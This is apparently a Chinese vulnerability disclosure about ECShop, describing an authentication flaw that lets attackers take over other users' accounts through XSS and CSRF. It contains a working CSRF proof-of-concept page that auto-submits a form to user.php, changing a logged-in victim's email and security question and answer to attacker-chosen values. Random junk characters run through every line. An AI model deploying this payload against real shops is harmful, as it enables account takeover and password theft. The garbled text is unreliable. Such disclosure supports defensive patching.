简要描述:9 A" q$ t) ]7 |/ r" j+ k
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现; V" o+ E4 A' ?) R8 Z7 w
7 P; k2 `, B2 rDemo For:http://www.wooyun.org/bug.php?action=view&id=395
7 Z0 {/ T! \, n3 [2 V+ l' ~
4 m& Y; q9 D: z7 S: N9 x9 ^5 I# _详细说明:+ X: ?0 K9 N1 o" n" T- k) M9 M5 U
利用csrf和xss可以突破官方所说的“障碍”
0 e6 z7 K* X% F8 zxss版本已经有人说明 z8 f; S B. n. E6 q
这里给出csrf版本
( h" x9 {6 h" [9 r
& E- H5 |; O# R3 w' ]漏洞证明:. W3 Q9 `8 ~( Z9 r/ \
<html>
$ Y) R" h N {( X8 ~5 @4 i0 E& l<body>$ O+ k* g- w z. Y+ T* G7 U* q
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
2 w4 a& g% j) b5 V/ H, H<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
1 x, W, ^$ T& z4 B$ {! V: e<INPUT TYPE="text" NAME="act" value="act_edit_profile">
3 r7 x; P' b7 b( [7 k<INPUT TYPE="text" NAME="sel_question" value="ecshop">
( Q, h2 d/ y" Q5 n9 l% K/ m' g% b<INPUT TYPE="text" NAME="passwd_answer" value="exploit"> [. c( f; O3 o3 t& \1 P2 E
</body>$ z, ]8 [+ {# S4 |! V* E
<script>+ L& R& q! v6 c$ E
document.forms[0].submit();
% P) ? {. {( @6 m1 S</script>
) r& i0 L8 J# _/ g! g4 b7 o</html>) V7 y! z1 c$ K. ^
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
2 L9 s8 b e! L7 T# q6 w; |. v5 ?
|